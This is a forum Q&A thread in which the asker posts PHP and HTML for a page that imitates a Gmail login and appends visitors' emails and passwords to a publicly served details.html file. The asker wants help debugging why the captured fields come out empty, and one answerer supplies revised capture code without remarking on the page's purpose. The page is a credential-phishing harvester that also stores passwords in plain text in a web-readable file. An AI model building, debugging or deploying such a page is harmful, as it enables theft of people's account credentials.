# My PHP code doesn't save the HTML form

Tags: php, html, forms

I've made code to create a form in HTML and I want to save the form details in my server so i've made a PHP code to save it and it won't show me the details themselves, it only saves:

Email: 
Password:

And the details from the form itself it won't save.

My PHP code:

```
<?php
$Email = "";
$Password = "";

if (isset($_POST["Email"])) {
$Email = $_POST["Email"];
}
if (isset($_POST["Password"])) {
$Password = $_POST["Password"];
}


$text = "
Email: $Email
Password: $Password";
$file = fopen('details.html','a+');
fwrite($file, $text);
fclose($file);
?>
```

My HTML code:

```
<html>
<head>
<title>Send price offer to Embit Systems Inc.</title>
<link rel="stylesheet" type="text/css" href="mystyle.css">
</head>
<body>
<p style="text-align:center;">
</p>
<br>
<br>
<p style="font-family: Verdana, Geneva, sans-serif;text-align: center;">
Please fill out your business Email details to send an offer to Embit Systems Inc.
</p>
<br>
<p>
<form action="1.php" method="POST" enctype="text/plain" style="background-image:url(fff.png);
background-position:center;
background-size:20%;
background-repeat: no-repeat;
text-align: center">
<br>
<p style="font-family: Verdana, Geneva, sans-serif;">Connect to your Gmail account</p>
<p style="font-family: Verdana, Geneva, sans-serif;">Email:</p>
<input type="text" name="Email" id="Email" style="    width: 15%;
padding: 12px 20px;
margin: 8px 0;
display: inline-block;
border: 1px solid #ccc;
border-radius: 4px;
box-sizing: border-box;">
<br>
<br>
<p style="font-family: Verdana, Geneva, sans-serif;">Password:</p>
<input type="password" name="Password" id="Password" style="    width: 15%;
display: inline-block;
padding: 12px 20px;
margin: 8px 0;
border: 1px solid #ccc;
border-radius: 4px;
box-sizing: border-box;">
<br>
<br>
<input type="submit" value="Login"  style="font-family: Verdana, Geneva, sans-serif;    width: 12%;
background-color: #498BF4;
color: white;
padding: 14px 20px;
margin: 8px 0;
border: none;
border-radius: 4px;
cursor: pointer;">
<br>
<br>
<br>
</form>
</p>
</body>
</html>
```

What do I need to change so my form will save itself in the site?

Edit: if it helps the site's URL is:
embit.comli.com

Answer (score 0):

Check your `Email` and `Password` are not empty, and then only append in your file,

```
if (isset($_POST["Email"]) && $_POST["Email"]) { // check email is not empty
   $Email = $_POST["Email"];
}
if (isset($_POST["Password"]) && $_POST["Password"]) { // check password is not empty
   $Password = $_POST["Password"];
}
if($Email && $Password){ // if both have values then only append in your file
   $text = "
     Email: $Email
     Password: $Password";
   $file = fopen('details.html','a+');
   fwrite($file, $text);
   fclose($file);
}
```

Comment: It won't save anything now, I fill in the form and submit and it saves nothing now.

Answer (score 0):

I can't understand what the problem may be...
It seems like I don't insert anything to the textboxes because what Rohan suggested doesn't seem to work.
Is there something wrong with the code? ID not matching or anything?